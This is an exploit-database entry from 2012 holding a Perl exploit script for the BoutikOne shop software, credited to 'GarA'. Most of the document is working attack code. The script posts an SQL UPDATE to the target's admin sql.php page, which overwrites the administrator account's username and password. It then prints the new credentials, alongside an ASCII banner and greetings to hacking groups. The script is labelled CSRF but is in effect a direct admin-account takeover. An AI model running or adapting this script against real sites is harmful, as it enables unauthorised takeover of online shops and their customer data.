BoutikOne CSRF Add User Vulnerability



EKU-ID: 2397 CVE: OSVDB-ID:
Author: GarA Published: 2012-07-03 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


#!/usr/bin/perl -w
# Exploit Title: BoutikOne CSRF Add User
# Exploit Author: GarA
# Vendor Homepage: www.boutikone.com
# Tested on: Win Xp sp3
system ("color a");
system ("cls");
$num_args = $#ARGV + 1;
if ($num_args != 4) {
print "            :MM:....:HMMM                   .MMMMMMMMMM.                                             \n";                
print "   .M    ..                MM.             M.      :MMMMH                            \n";                                  
print "    M M                       MH        .MM           M                        \n"       ;                                 
print "    .M HM                       M:     MMMMMMH                              \n"           ;                                
print "     HM  MMH                     :M   MMMMMMMMMMMH                            \n"          ;                               
print "    .M  MMMMMMM:                  .     .MMMMMMMMMMM.                         \n"           ;                              
print "   M  MMMM :MMMMMMMMH H            M          MMMMMMMM:                       \n"            ;                             
print "      MMM  . :MMMMMMMM             M              MMMMMM                      \n"             ;                            
print "   M  HMM H MM HMMMMM              M.               MMMMM                    \n"               ;                           
print "  .:   .M  H.:  MMHMM              M                 .MMM                      \n"              ;                          
print "    .   .MM   MM  M:               M                  :MMH    MMMMM   M. HMMM   HMMMM    .M.  .M    MH   \n";             
print "   ..    :MMMM:   .M               .                   MM.  HMH   :.  MMM. .M  MM    MH  .MM  MMM  :M:   \n" ;             
print "     H   :  :MMH                  M                   .MM   MH       .MM    .   MMMM :M.  MM  MHM  MM     \n" ;            
print "      MM   HM:    :             HM                    MM    M        .MH           .MMM:  MM M..M.:M:    \n"   ;           
print "       HM:    .MMM            :M                     MM     MM    :H .MH      MM     MM   .MMM  MMMM     \n"    ;          
print "         MMMMHHMM          :MH                      M        HMMMMH   MH        MMMMM      MM   .MM    \n" ;
print " \n";
print "\n BoutikOne CSRF Add User  \n";
print "\nUsage:  $0 www.site.com admin-path user password \n";
print ("=========================================\n");
print (" Exploit discovered & coded by GarA \n");
print " Gr33tz to : Dr.Sayr0s , Dr.BiLLi , Last Breath \n";
print " Dr.Milas , O-Snip3r , Ev!l Code , P4L-T3RRORIST \n";
print " Mr NoRvI , Dr.s@3d , Mr MeGa , ViRuS_PaL \n";
print " Mafia Hack Team & Scr3w & Arhack.net ";
  exit;
}

$site=$ARGV[0];
$admn=$ARGV[1];
$usr=$ARGV[2];
$pass=$ARGV[3];
  use LWP::UserAgent;
  $ua = new LWP::UserAgent;
  $ua->agent("AgentName/0.1 " . $ua->agent);
  my $req = new HTTP::Request POST => 'http://' . $site . '/'. $admn . '/sql.php';
  $req->content_type('application/x-www-form-urlencoded');
  $req->content('request=UPDATE+admin+SET+motdepasse+%3D+%27' . $pass .'%27+%2C+admin+%3D+%27' . $usr . '%27+WHERE+ID+%3D+1');
 
  my $res = $ua->request($req);

if ($res->content =~ /SQL exйcutйe avec succ/ )
{
print ("Don3 ~\n");
print ("usr :" . $usr . "\n");
print ( "pwd :" . $pass . "\n");
print ("3nj0y \n");
}
else
{
print "Faild :s \n";

}